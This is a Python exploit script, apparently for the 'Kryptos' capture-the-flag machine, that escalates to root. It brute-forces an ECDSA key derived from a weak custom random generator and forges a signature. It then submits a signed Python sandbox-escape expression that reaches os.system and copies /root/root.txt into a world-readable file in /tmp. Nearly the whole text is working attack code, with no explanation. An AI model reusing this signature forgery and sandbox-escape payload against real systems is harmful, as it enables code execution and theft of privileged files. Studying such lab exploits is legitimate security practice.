Getting root access on kryptos by abusing weak prng and python reflection

kryptos_root.py

import random
import json
import hashlib
import binascii
from ecdsa import VerifyingKey, SigningKey, NIST384p
from bottle import route, run, request, debug
from bottle import hook
from bottle import response as resp
import sys
import requests


def secure_rng(seed):
    # Taken from the internet - probably secure
    p = 2147483647
    g = 2255412

    keyLength = 32
    ret = 0
    ths = round((p-1)/2)
    for i in range(keyLength*8):
        seed = pow(g,seed,p)
        if seed > ths:
            ret += 2**i
    return ret

def verify(msg, sig):
    try:
        return vk.verify(binascii.unhexlify(sig), msg)
    except:
        return False

def sign(msg):
    return binascii.hexlify(sk.sign(msg))

print "[+] Signing expression.."

expr = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cp /root/root.txt /tmp/xct && chmod 777 /tmp/xct')"

proxies = {'http': "http://localhost:9090"}

response = 'Bad signature'

print "Bruting.."
while response == 'Bad signature':
    seed = random.getrandbits(128)
    rand = secure_rng(seed) + 1
    sk = SigningKey.from_secret_exponent(rand, curve=NIST384p)
    vk = sk.get_verifying_key()
    sig = sign(expr)

    r = requests.post('http://127.0.0.1:81/eval', json={'expr': expr, 'sig': sig}, proxies=proxies)
    
    response = r.text
print r.text
print seed